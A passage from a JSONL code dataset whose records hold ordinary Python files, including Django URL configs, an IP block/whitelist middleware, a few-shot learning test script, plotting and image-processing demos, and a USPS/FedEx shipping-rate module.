url(r'^new/.*', test, name='new'), \n# ]\n\n\nurlpatterns = patterns('',\n url(r'^$', question_list, name='question_list'),\n url(r'^question/(?P<pk>\\d+)/', question_detail, name='question_detail'),\n url(r'^popular/', popular, name='popular'),\n url(r'^login/', test, name='login'),\n url(r'^signup/', test, name='signup'),\n url(r'^ask/', test, name='ask'),\n url(r'^new/', test, name='new'),\n 
url(r'^admin/', admin.site.urls),\n)","repo_name":"seblex/stepic","sub_path":"ask/qa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19723619982","text":"from typing import List\n\nimport datetime\nimport pandas as pd\n\n\nclass DateListConverter:\n @staticmethod\n def convert(dates: List[datetime.datetime], days=10) -> pd.DataFrame:\n df = pd.DataFrame(columns=[\"solved\"])\n for date in dates:\n x = pd.DataFrame({\"solved\": [1]}, index=[date])\n df = df.append(x)\n\n for i in range(days):\n date = datetime.datetime.now() - datetime.timedelta(days=i)\n x = pd.DataFrame({\"solved\": [0]}, index=[date])\n df = df.append(x)\n\n df = df.groupby(pd.Grouper(level=0, freq=\"d\")).sum()\n return df.sort_index(ascending=False)[:days].sort_index(ascending=True)\n","repo_name":"kenkoooo/todoist-achievements","sub_path":"todoist_achievements/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40033348632","text":"import logging\nfrom logging.config import dictConfig\nfrom tqdm import tqdm\n\nlogging_config = dict(\n version=1,\n formatters={\n 'f': {'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'},\n 'f1': {'format': '%(asctime)s %(levelname)-8s %(message)s'}\n },\n handlers={\n 'sh': {'class': 'logging.StreamHandler',\n 'formatter': 'f',\n 'level': logging.DEBUG\n },\n 'fh': {'class': 'logging.FileHandler',\n 'filename': 'word2vec.log',\n 'formatter': 'f1',\n 'level': logging.DEBUG\n }\n },\n root={\n 'handlers': ['sh', 'fh'],\n 'level': logging.DEBUG,\n },\n)\ndictConfig(logging_config)\nlogger = logging.getLogger()\n\n\nclass TaskReporter(object):\n def __init__(self, task):\n self.task = task\n\n def __call__(self, original_func):\n decorator_self = self\n\n def wrapper(*args, **kwargs):\n logger.info(\"Processing task: {}...\".format(decorator_self.task))\n res = original_func(*args, **kwargs)\n logger.info(\"Task: {} is done\".format(decorator_self.task))\n return res\n return wrapper\n\n\nclass DLProgress(tqdm):\n last_block = 0\n\n def hook(self, block_num=1, block_size=1, total_size=None):\n \"\"\"\n :param block_num: int, optional\n Number of blocks transferred so far [default: 1].\n :param block_size: int, optional\n Size of each block (in tqdm units) [default: 1].\n :param total_size: int, optional\n Total size (in tqdm units). 
If [default: None] remains unchanged.\n \"\"\"\n self.total = total_size\n self.update((block_num - self.last_block) * block_size)\n self.last_block = block_num\n\n","repo_name":"chutianwen/TensorflowProjects","sub_path":"Embedding_Word2Vec/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9680472702","text":"import torch\nimport json\nimport os\nimport glob\nimport random\nimport time\nimport argparse\nimport yaml\nimport numpy as np\nfrom easydict import EasyDict\nimport sys\nimport os.path as osp\nif not os.getcwd() in sys.path:\n sys.path.append(os.getcwd())\nfrom fewshot.data import feature_loader\nfrom fewshot.utils import model_util, data_util,com_util\n\ndef main(params):\n acc_all = []\n\n print('dataset: {}, method: {}, model: {}'.format(params.dataset, params.method, params.model))\n\n # load model\n model = model_util.get_model(params, False)\n\n save_dir = com_util.get_save_dir(params)\n if params.save_iter != -1:\n modelfile = com_util.get_assigned_file(save_dir, params.save_iter)\n else:\n modelfile = com_util.get_best_file(save_dir)\n if modelfile is not None:\n tmp = torch.load(modelfile)\n # import pdb; pdb.set_trace()\n model.load_state_dict(tmp['state_dict'], strict=False)\n\n split = params.split\n iter_num = params.iter_num\n if params.save_iter != -1:\n split_str = split + \"_\" + str(params.save_iter)\n else:\n split_str = split\n\n # test\n if params.method in ['maml', 'maml_approx', 'protonet', 'protonet_joint']:\n novel_loader = data_util.get(params, False)\n model.eval()\n acc_mean, acc_std = model.test_loop(novel_loader, return_std=True)\n else:\n few_shot_params = dict(n_way=params.test_n_way, n_support=params.n_shot)\n novel_file = os.path.join(save_dir.replace(\"ckpts\", \"feats\"), split_str + \".hdf5\")\n cl_data_file = feature_loader.init_loader(novel_file)\n ## 5 way 5 shot default\n for i in range(iter_num):\n acc = feat_eval(cl_data_file, model, n_query=15, adaptation=params.adaptation, **few_shot_params)\n acc_all.append(acc)\n acc_all = np.asarray(acc_all)\n acc_mean = np.mean(acc_all)\n acc_std = np.std(acc_all)\n print('%d Test Acc = %4.2f%% +- %4.2f%%' % (iter_num, acc_mean, 1.96*acc_std/np.sqrt(iter_num)))\n\n # record\n with open(osp.join(save_dir, 'record.txt'), 'a') as f:\n timestamp = time.strftime(\"%Y%m%d-%H%M%S\", time.localtime())\n aug_str = '-aug' if params.train_aug else ''\n aug_str += '-adapted' if params.adaptation else ''\n if params.method in ['baseline', 'baseline++'] :\n exp_setting = '%s-%s-%s-%s%s %sshot %sway_test' %(params.dataset, split_str, params.model, params.method, aug_str, params.n_shot, params.test_n_way )\n else:\n exp_setting = '%s-%s-%s-%s%s %sshot %sway_train %sway_test' % (params.dataset, split_str, params.model, params.method, aug_str, params.n_shot, params.train_n_way, params.test_n_way)\n acc_str = '%d Test Acc = %4.2f%% +- %4.2f%%' % (iter_num, acc_mean, 1.96* acc_std/np.sqrt(iter_num))\n f.write( 'Time: %s, Setting: %s, Acc: %s \\n' % (timestamp,exp_setting,acc_str))\n\n\ndef feat_eval(cl_data_file, model, n_way = 5, n_support = 5, n_query = 15, adaptation = False):\n class_list = cl_data_file.keys()\n\n select_class = random.sample(class_list, n_way)\n z_all = []\n for cl in select_class:\n img_feat = cl_data_file[cl]\n perm_ids = np.random.permutation(len(img_feat)).tolist()\n z_all.append([np.squeeze( img_feat[perm_ids[i]]) for i in range(n_support+n_query)])\n z_all = 
torch.from_numpy(np.array(z_all))\n\n model.n_query = n_query\n if adaptation:\n scores = model.set_forward_adaptation(z_all, is_feature = True)\n else:\n scores = model.set_forward(z_all, is_feature = True)\n pred = scores.data.cpu().numpy().argmax(axis = 1)\n y = np.repeat(range( n_way ), n_query)\n acc = np.mean(pred == y) * 100\n return acc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='PyTorch Testing')\n parser.add_argument('--config', default='cfgs/baseline/miniImagenet.yaml')\n args = parser.parse_args()\n\n with open(args.config) as f:\n config = yaml.load(f)\n params = EasyDict(config['common'])\n params.update(config['test'])\n\n main(params)\n","repo_name":"LargeFishPKU/Joint-KG-Vision-Project","sub_path":"fsl-pytorch-master/tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38900982441","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 1640.py\n# @Time : 2020/11/23 23:38\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [1640. 能否连接形成数组](https://leetcode-cn.com/problems/check-array-formation-through-concatenation/)\n \"\"\"\n @timeit\n def canFormArray(self, arr: List[int], pieces: List[List[int]]) -> bool:\n n = len(pieces)\n m = len(arr)\n ids = [0] * n\n i = 0\n while i < m:\n last = i\n j = 0\n while j < n:\n while ids[j] < len(pieces[j]) and pieces[j][ids[j]] == arr[i]:\n ids[j] += 1\n i += 1\n if i != last: break\n j += 1\n if last == i or ids[j] != len(pieces[j]): return False\n return all(ids[i] == len(pieces[i]) for i in range(n))\n\n\n\nif __name__ == '__main__':\n a = Solution()\n a.canFormArray(arr = [85], pieces = [[85]])\n a.canFormArray(arr = [15,88], pieces = [[88],[15]])\n a.canFormArray(arr = [49,18,16], pieces = [[16,18,49]])\n a.canFormArray(arr = [91,4,64,78], pieces = [[78],[4,64],[91]])\n a.canFormArray(arr = [1,3,5,7], pieces = [[2,4,6,8]])\n a.canFormArray([1,2,3], [[2],[1,3]])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/1501-1800/1640.py","file_name":"1640.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28613607297","text":"#!/usr/bin/env pypy\n\nimport sys\n\nif len(sys.argv) < 2:\n print(\"Usage: %s [N]\" % (sys.argv[0], ))\n exit(-1)\n\nN = int(sys.argv[1])\n\nseq = [x for x in range(1, N + 1)]\nfor i in range(1, len(seq) / 2, 2):\n seq[i], seq[len(seq) - i - 1] = seq[len(seq) - i - 1], seq[i]\n\nfor x in seq:\n print(\"%s\" % (x, ))\n","repo_name":"riteme/test","sub_path":"oi/Contest/self/2016-6/riteme/divide-gen.py","file_name":"divide-gen.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39379237540","text":"\"\"\"online_shop_be URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. 
Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom products.views import *\nfrom orders.views import * \n\n# from rest_framework import routers\n\n# router = routers.DefaultRouter()\n# router.register(r'products', viewProducts.ProductView, 'product')\n# router.register(r'orders', viewOrders.OrderView, 'order')\n\n# urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('api/', include(router.urls))\n# ]\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path(\"api/orders/\", \n OrderListCreateAPIView.as_view(), \n name=\"order-list\"),\n\n path(\"api/orders/<int:pk>/\", \n OrderDetailAPIView.as_view(), \n name=\"order-detail\"),\n\n path(\"api/products/\", \n ProductListCreateAPIView.as_view(), \n name=\"product-list\"),\n \n path(\"api/products/<int:pk>\", \n ProductDetailAPIView.as_view(), \n name=\"product-detail\")\n]","repo_name":"Serenity911/online_shop_be","sub_path":"online_shop_be/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36818387193","text":"import datetime\r\nfrom .models import BlockedIP, WhitelistedIP\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponseForbidden\r\n\r\n\r\nclass IPBlockerMiddleWare:\r\n def __init__(self, get_response):\r\n self.whitelisted_ips = [x['ip'] for x in WhitelistedIP.objects.values('ip')]\r\n self.blocked_ips = [x['ip'] for x in BlockedIP.objects.values('ip')]\r\n self.get_response = get_response\r\n self.last_check = 0\r\n self.response = None\r\n\r\n def __call__(self, request):\r\n self.date = datetime.datetime.now().strftime('%Y%j%H%M')\r\n self.request = request\r\n self.ip = self.get_client_ip()\r\n self.response = self.get_response(self.request)\r\n\r\n try:\r\n self.whitelist = settings.WHITELIST\r\n\r\n except AttributeError:\r\n self.whitelist = False\r\n\r\n try:\r\n self.block_time = settings.BLOCK_TIME\r\n\r\n except AttributeError:\r\n self.block_time = 10\r\n\r\n if not isinstance(self.block_time, int) and self.block_time is not None:\r\n raise ValueError('\\'BLOCK_TIME\\' must be an integer or a NoneType')\r\n\r\n if not isinstance(self.whitelist, bool):\r\n raise ValueError('\\'WHITELIST\\' must be a boolean')\r\n\r\n return self.check()\r\n\r\n def check(self):\r\n if self.block_time:\r\n if int(self.date) - int(self.last_check) >= self.block_time:\r\n self.refresh()\r\n else:\r\n self.refresh()\r\n\r\n if self.whitelist:\r\n if self.ip not in self.whitelisted_ips:\r\n self.response = HttpResponseForbidden()\r\n else:\r\n if self.ip in self.blocked_ips:\r\n self.response = HttpResponseForbidden()\r\n\r\n return self.response\r\n\r\n def refresh(self):\r\n self.whitelisted_ips = [x['ip'] for x in WhitelistedIP.objects.values('ip')]\r\n self.blocked_ips = [x['ip'] for x in BlockedIP.objects.values('ip')]\r\n self.last_check = datetime.datetime.now().strftime('%Y%j%H%M')\r\n\r\n def get_client_ip(self):\r\n x_forwarded_for = self.request.META.get('HTTP_X_FORWARDED_FOR')\r\n if x_forwarded_for:\r\n ip = x_forwarded_for.split(',')[0]\r\n else:\r\n ip = self.request.META.get('REMOTE_ADDR')\r\n\r\n return 
ip\r\n","repo_name":"RootOperator/django-ip-block-whitelist","sub_path":"ip_block_whitelist/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12758265863","text":"a = input()\nb = input()\nresult = \"\"\nfor i in range(len(a)):\n result += a[i]\n if i == len(b) - 1 and len(a) > len(b):\n result += b[i]\n break\n for j in range(len(b)):\n if j == len(b) and len(b) > len(a):\n result += b[j, :]\n if i == j:\n result += b[j]\n\n\nprint(result)\n","repo_name":"elyasha/simple-tic-tac-toe","sub_path":"Topics/Iterators/Word constructor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22371335875","text":"import cv2\nimport numpy as np\no = cv2.imread(\"edges_close.bmp\")\nsrc = cv2.imread(\"Image0001.bmp\")\nheight,width = src.shape[0:2]\nsrc = cv2.resize(src,(int(width/2),int(height/2)))\ngray = cv2.cvtColor(o,cv2.COLOR_BGR2GRAY)\nret, binary = cv2.threshold(gray,127,255,cv2.THRESH_BINARY)\ncontours, hierarchy = cv2.findContours(binary,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\nfor i in range(len(contours)):\n hull = cv2.convexHull(contours[i])\n cv2.polylines(src, [hull], True, (0, 255, 0), 2)\ncv2.imshow(\"result\",src)\ncv2.imwrite(\"result.bmp\",src)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"Seanhom/MyNote","sub_path":"opencv/划痕检测/缺陷包围框.py","file_name":"缺陷包围框.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9250785614","text":"from itertools import combinations\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.gridspec import GridSpec\nfrom matplotlib.patches import Rectangle\n\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\n\nfrom metroplot import metroplot\n\n# Metroplot usage example\n\n# Read Eysenck (1974) table from David Howell's website\ndata = pd.read_csv(\n \"https://www.uvm.edu/~statdhtx/methods8/DataFiles/Tab13-2.dat\", delimiter=\"\\t\"\n)\ndata[\"Condition\"] = [\n {1: \"Counting\", 2: \"Rhyming\", 3: \"Adjective\", 4: \"Imagery\", 5: \"Intention\"}[c]\n for c in data[\"Condition\"]\n]\ndata[\"Age\"] = [{1: \"Old\", 2: \"Young\"}[c] for c in data[\"Age\"]]\n\n\ndef pairwise_ttest(data, factor, dependent):\n \"\"\"run t-tests between all levels of a factor and\"\"\"\n levels = data[factor].unique()\n\n # test all pairwise comparisons\n pairwise_comparisons = []\n for level1, level2 in combinations(levels, r=2):\n a = data.loc[data[factor] == level1, dependent]\n b = data.loc[data[factor] == level2, dependent]\n\n t, p_value, df = sm.stats.ttest_ind(a, b)\n\n pairwise_comparisons.append(\n {\n \"level1\": level1,\n \"level2\": level2,\n \"effect_direction\": np.sign(t),\n \"p_value\": p_value,\n }\n )\n pairwise_comparisons = pd.DataFrame(pairwise_comparisons)\n\n # multiple comparison correction\n (\n is_sig,\n corrected,\n _,\n _,\n ) = sm.stats.multipletests(pairwise_comparisons[\"p_value\"], method=\"fdr_bh\")\n\n pairwise_comparisons[\"is_sig\"] = is_sig\n pairwise_comparisons[\"corrected_p_value\"] = corrected # this is not currently used\n\n return pairwise_comparisons\n\n\npairwise_comparisons = pairwise_ttest(data, \"Condition\", \"Recall\")\n\nconditions = data[\"Condition\"].unique()\n\nprint(\"pairwise comparisons 
results:\")\nprint(pairwise_comparisons)\n\nfig = plt.figure(figsize=(5, 4))\ngs = GridSpec(\n 2, 1, height_ratios=[0.75, 5], hspace=0.05, figure=fig\n) # we create two subplots, one for the main plot and one for the metroplot.\nax0 = fig.add_subplot(gs[1])\nsns.barplot(data=data, x=\"Condition\", y=\"Recall\", order=conditions)\nsns.despine(fig)\ngs.tight_layout(fig)\n\n# # grab colors from Seaborn's barplot.\nbars = [r for r in ax0.get_children() if type(r) == Rectangle]\ncolors = [c.get_facecolor() for c in bars[:-1]]\nlevel_palette = {cond: color for cond, color in zip(conditions, colors)}\n\nlevel_to_location = {\n cond: i for i, cond in enumerate(conditions)\n} # map categories to x axis locations.\nax1 = fig.add_subplot(gs[0])\nmetroplot(\n pairwise_comparisons,\n level_to_location=level_to_location,\n metroplot_element_order=conditions,\n ax=ax1,\n level_axis=\"x\",\n dominating_effect_direction=1,\n level_pallete=level_palette,\n level_axis_lim=ax0.get_xlim(),\n)\n# # note that level_axis_lim=ax0.get_xlim() aligns the metrplot with the main plot\n\n# %%\n# a slightly more complicated example\n\nfig = plt.figure(figsize=(6, 6))\ngs = GridSpec(1, 2, width_ratios=[4, 2.5], wspace=0.01, figure=fig)\nax0 = fig.add_subplot(gs[0])\n\ndata[\"Group\"] = [cond + \" \" + age for age, cond in zip(data[\"Age\"], data[\"Condition\"])]\nlevel_palette = {\n \"Counting\": \"#a6cee3\",\n \"Rhyming\": \"#1f78b4\",\n \"Adjective\": \"#b2df8a\",\n \"Imagery\": \"#33a02c\",\n \"Intention\": \"#fb9a99\",\n}\n\npairwise_comparisons = pairwise_ttest(data, \"Group\", \"Recall\")\n\nprint(\"pairwise comparisons results:\")\nprint(pairwise_comparisons)\n\nconditions = data[\"Group\"].unique()\nconditions.sort()\n\nsns.boxplot(\n data=data, y=\"Group\", x=\"Recall\", ax=ax0, color=\"w\", order=conditions\n) # , hue='Condition', palette=level_palette)\ngs.tight_layout(fig)\n\nlevel_to_location = {\n cond: i for i, cond in enumerate(conditions)\n} # map categories to y axis locations.\n\nax1 = fig.add_subplot(gs[1])\nmetroplot(\n pairwise_comparisons,\n level_to_location=level_to_location,\n metroplot_element_order=conditions,\n ax=ax1,\n level_axis=\"y\",\n dominating_effect_direction=1,\n level_pallete=\"k\",\n level_axis_lim=ax0.get_ylim(),\n)\n# # note that level_axis_lim=ax0.get_ylim() aligns the metrplot with the main plot\n\nplt.show()\n","repo_name":"Tal-Golan/metroplot","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"17594275228","text":"import dataclasses\nimport gzip\nimport logging\nimport pathlib\nimport re\nfrom typing import Callable, Generator, Iterable, Iterator, List, Optional\n\n_logger = logging.getLogger()\n\n\n_FILE_PART_RE = re.compile(r\"tweets-(\\d+)\\.jsonl\\.gz\")\n\n\nclass _FileMaxSizeReached(Exception):\n pass\n\n\ndef get_index_from_filename(filename: str) -> Optional[int]:\n \"\"\"Extracts file index from filename\n\n Examples:\n Filename: `tweets-2.jsonl.gz` -> `2`\n\n Filename: `tweets-a.jsonl.gz` -> `None`\n \"\"\"\n match = _FILE_PART_RE.fullmatch(filename)\n if match is None:\n # No match\n return None\n return int(match.group(1))\n\n\ndef get_latest_file_index(filenames: List[str]) -> int:\n \"\"\"The number suffix of the file to write the next documents\n\n Returns:\n int: Index of next file\n \"\"\"\n file_indices = list(filter(None, (get_index_from_filename(f) for f in filenames)))\n if len(file_indices) == 0:\n # When no 
files we start at 0\n return 0\n if len(file_indices) == 1:\n # Only one file\n return file_indices[0]\n # Otherwise multiple files\n return max(file_indices)\n\n\n@dataclasses.dataclass\nclass LocalFileDriver:\n \"\"\"Drivers that writes text in local files\n\n Attributes:\n path (str): The path to a local folder\n max_file_size (int): The maximum file size before writing to a new file.\n Default to 1G.\n \"\"\"\n\n path: pathlib.Path\n max_file_size: int = 2**30\n\n def __post_init__(self):\n # Must be a valid folder\n try:\n self.path.mkdir(parents=True, exist_ok=True)\n except FileExistsError:\n # The path exists and is a not a folder\n raise ValueError(\"The path should be a folder.\")\n\n def _iterate_line_until_file_max_size(\n self, file_size_fun: Callable[[], int], lines: Iterator[bytes]\n ) -> Generator[bytes, None, None]:\n while True:\n # If the file is already too big, we raise\n if file_size_fun() > self.max_file_size:\n raise _FileMaxSizeReached(\"Maximum file size reached\")\n\n # Try to get the next element, if we reached the end, we stop\n try:\n line = next(lines)\n except StopIteration:\n break\n\n yield line\n\n def _writelines_to_file(\n self, file_path: pathlib.Path, lines: Iterator[bytes]\n ) -> None:\n \"\"\"Write lines to a file until we reach the max_file_size\n\n Raises:\n _FileMaxSizeReached: When the file if bigger that the max_file_size\n \"\"\"\n with gzip.open(file_path, mode=\"ab\") as f:\n for line in self._iterate_line_until_file_max_size(f.tell, lines):\n f.write(line)\n\n def get_current_file_index(self) -> int:\n \"\"\"The number suffix of the file to write the next documents\n\n Returns:\n int: Index of next file\n \"\"\"\n filenames = [f.name for f in self.path.glob(\"tweets-*.jsonl.gz\") if f.is_file()]\n return get_latest_file_index(filenames)\n\n def file_index_to_name(self, index: int) -> pathlib.Path:\n return self.path / f\"tweets-{index}.jsonl.gz\"\n\n def writelines(self, lines: Iterable[bytes]) -> None:\n lines_iterator = iter(lines)\n file_index = self.get_current_file_index()\n while True:\n file_path = self.file_index_to_name(file_index)\n try:\n _logger.info(f\"Starting to write to file {file_path}\")\n self._writelines_to_file(file_path, lines_iterator)\n except _FileMaxSizeReached:\n # Move to next file\n file_index += 1\n else:\n # We went reached the end of the stream\n break\n","repo_name":"smassonnet/twcollect","sub_path":"src/twcollect/drivers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37845934782","text":"from dataclasses import dataclass\nfrom decimal import Decimal\nimport os\nfrom xml.etree import ElementTree as ET\n\nfrom flask import current_app\nimport requests\n\n# from requests_futures.sessions import FuturesSession # if using async requests\nimport xmltodict\nimport zeep\n\n\nORIGIN_ADDRESS = os.environ.get(\"ORIGIN_ADDRESS\")\nUSPS_USER_ID = os.environ.get(\"USPS_USER_ID\")\nUSPS_PASS = os.environ.get(\"USPS_PASS\")\nUSPS_PRODUCTION_URL = \"http://production.shippingapis.com/ShippingAPI.dll\"\nUSPS_SECURE_URL = \"https://secure.shippingapis.com/ShippingAPI.dll\"\nSHIPENGINE_KEY = os.environ.get(\"SHIPENGINE_KEY\")\nSHIPENGINE_GET_RATES = os.environ.get(\"SHIPENGINE_GET_RATES\", False)\nENDICIA_ID = os.environ.get(\"ENDICIA_KEY\")\nFEDEX_ID = os.environ.get(\"FEDEX_ID\")\nFEDEX_KEY = os.environ.get(\"FEDEX_KEY\")\nFEDEX_PASS = os.environ.get(\"FEDEX_PASS\")\nFEDEX_ACCOUNT = 
os.environ.get(\"FEDEX_ACCOUNT\")\nFEDEX_METER = os.environ.get(\"FEDEX_METER\")\n\nWebAuthenticationDetail = {\"UserCredential\": {\"Key\": FEDEX_KEY, \"Password\": FEDEX_PASS}}\nClientDetail = {\"AccountNumber\": FEDEX_ACCOUNT, \"MeterNumber\": FEDEX_METER}\nVersion = {\"Major\": 24, \"ServiceId\": \"crs\", \"Intermediate\": 0, \"Minor\": 0}\n\n\n@dataclass\nclass ShippingAddress:\n postal_code: str\n name: str = \"\"\n phone: str = \"\"\n company_name: str = \"\"\n address_line1: str = \"\"\n address_line2: str = \"\"\n city: str = \"Seattle\"\n state: str = \"WA\"\n country: str = \"US\"\n\n\ndefault_origin = ShippingAddress(ORIGIN_ADDRESS or \"98101\")\n\n\n@dataclass\nclass DestinationAddress(ShippingAddress):\n origin_address: ShippingAddress = ShippingAddress(\"98101\")\n\n def get_shipengine(self, origin_address=default_origin, weight: int = 1):\n \"\"\"\n Get rates from shipengine. Because of potential fees, this is avoided unless explicitly invoked\n :param origin_address: 'ShippingAddress'\n :param weight: int ounces\n :return: rate dictionary\n \"\"\"\n rate_url = \"https://api.shipengine.com/v1/rates\"\n headers = {\"Content-type\": \"application/json\", \"api-key\": SHIPENGINE_KEY}\n\n ship_data = {\n \"shipment\": {\n \"validate_address\": \"no_validation\",\n \"ship_to\": {\n \"postal_code\": self.postal_code,\n \"country_code\": self.country,\n },\n \"ship_from\": {\n \"name\": origin_address.name,\n \"phone\": origin_address.phone,\n \"company_name\": origin_address.company_name,\n \"address_line1\": origin_address.address_line1,\n \"address_line2\": origin_address.address_line2,\n \"city_locality\": origin_address.city,\n \"state_province\": origin_address.state,\n \"postal_code\": origin_address.postal_code,\n \"country_code\": origin_address.country,\n },\n \"packages\": [{\"weight\": {\"value\": weight, \"unit\": \"ounce\"}}],\n },\n \"rate_options\": {\"carrier_ids\": [FEDEX_ID, ENDICIA_ID]},\n }\n rate_json = requests.post(rate_url, headers=headers, json=ship_data).json()\n rate_values = [\n {\n \"service\": rate.get(\"service_code\"),\n \"rate\": rate.get(\"shipping_amount\").get(\"amount\"),\n }\n for rate in rate_json[\"rate_response\"][\"invalid_rates\"]\n ]\n return rate_values\n\n def _request_usps_domestic(self, weight, origin_address=default_origin):\n \"\"\"\n Structure and send request for USPS rates\n :param weight: in oz\n :type origin_address: 'ShippingAddress'\n :return: Ordered Dict of services and rates\n \"\"\"\n current_app.logger.info(weight)\n request_xml = ET.Element(\"RateV4Request\")\n request_xml.attrib = {\"USERID\": str(USPS_USER_ID)}\n\n ET.SubElement(request_xml, \"Revision\").text = \"2\"\n\n package_xml = ET.SubElement(request_xml, \"Package\")\n package_xml.attrib = {\"ID\": \"EX158\"}\n\n ET.SubElement(package_xml, \"Service\").text = \"ALL\"\n ET.SubElement(package_xml, \"FirstClassMailType\").text = \"ALL\"\n ET.SubElement(package_xml, \"ZipOrigination\").text = str(\n origin_address.postal_code or \"98101\"\n )\n ET.SubElement(package_xml, \"ZipDestination\").text = str(\n self.postal_code or \"66606\"\n )\n ET.SubElement(package_xml, \"Pounds\").text = \"0\"\n ET.SubElement(package_xml, \"Ounces\").text = str(weight)\n ET.SubElement(package_xml, \"Container\")\n ET.SubElement(package_xml, \"Size\").text = \"Regular\"\n ET.SubElement(package_xml, \"Machinable\").text = \"true\"\n data_xml = {\"API\": \"RateV4\", \"XML\": ET.tostring(request_xml, \"unicode\")}\n\n results = requests.post(url=USPS_PRODUCTION_URL, data=data_xml)\n 
return results\n\n def get_usps_domestic(self, weight: int = 1) -> dict:\n \"\"\"\n Take result from usps api call and output rate data as dict\n :return: rate dict\n \"\"\"\n try:\n parsed_results = xmltodict.parse(\n self._request_usps_domestic(weight).content\n )[\"RateV4Response\"][\"Package\"][\"Postage\"]\n priority = next(\n (\n Decimal(service[\"Rate\"])\n for service in parsed_results\n if service[\"@CLASSID\"] == \"1\"\n ),\n None,\n )\n first_class = next(\n (\n Decimal(service[\"Rate\"])\n for service in parsed_results\n if service[\"MailService\"]\n == \"First-Class Package Service - Retail<sup>™</sup>\" # Get Better Identifiers\n ),\n None,\n )\n rates = {\"USPS_PRIORITY\": priority, \"USPS_FIRST_CLASS\": first_class}\n except KeyError:\n rates = {\"USPS_PRIORITY\": None, \"USPS_FIRST_CLASS\": None}\n return rates\n\n def get_fedex_rates(self, origin_address=default_origin, weight=1.0):\n \"\"\"\n Get FedEx Rates using webservices\n :param origin_address: 'ShippingAddress'\n :param weight: in ounces\n :return: rate dict\n \"\"\"\n fedex_client = zeep.Client(\n current_app.open_instance_resource(\"RateService_v24.wsdl\")\n )\n requested_shipment = {\n \"Shipper\": {\n \"Address\": {\n \"PostalCode\": origin_address.postal_code,\n \"CountryCode\": origin_address.country,\n \"StateOrProvinceCode\": origin_address.state,\n }\n },\n \"Recipient\": {\n \"Address\": {\n \"PostalCode\": self.postal_code or 32703,\n \"CountryCode\": self.country or \"US\",\n }\n },\n \"RequestedPackageLineItems\": {\n \"Weight\": {\"Units\": \"LB\", \"Value\": weight},\n \"GroupPackageCount\": 1,\n },\n \"PackageCount\": 1,\n }\n try:\n rate_request = fedex_client.service.getRates(\n WebAuthenticationDetail=WebAuthenticationDetail,\n ClientDetail=ClientDetail,\n Version=Version,\n RequestedShipment=requested_shipment,\n )\n ground_rate = [\n reply\n for reply in rate_request[\"RateReplyDetails\"]\n if reply[\"ServiceType\"] == \"FEDEX_GROUND\"\n ]\n ground_rate_value = ground_rate[0][\"RatedShipmentDetails\"][0][\n \"ShipmentRateDetail\"\n ][\"TotalNetFedExCharge\"][\"Amount\"]\n except (IndexError, zeep.exceptions.ValidationError):\n ground_rate_value = None\n return {\"FEDEX_GROUND\": ground_rate_value}\n","repo_name":"MarkWine/flask_shop","sub_path":"shop/blueprints/cart/shipping.py","file_name":"shipping.py","file_ext":"py","file_size_in_byte":7879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13662439348","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pranavburugula\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport re\nimport sys\nimport 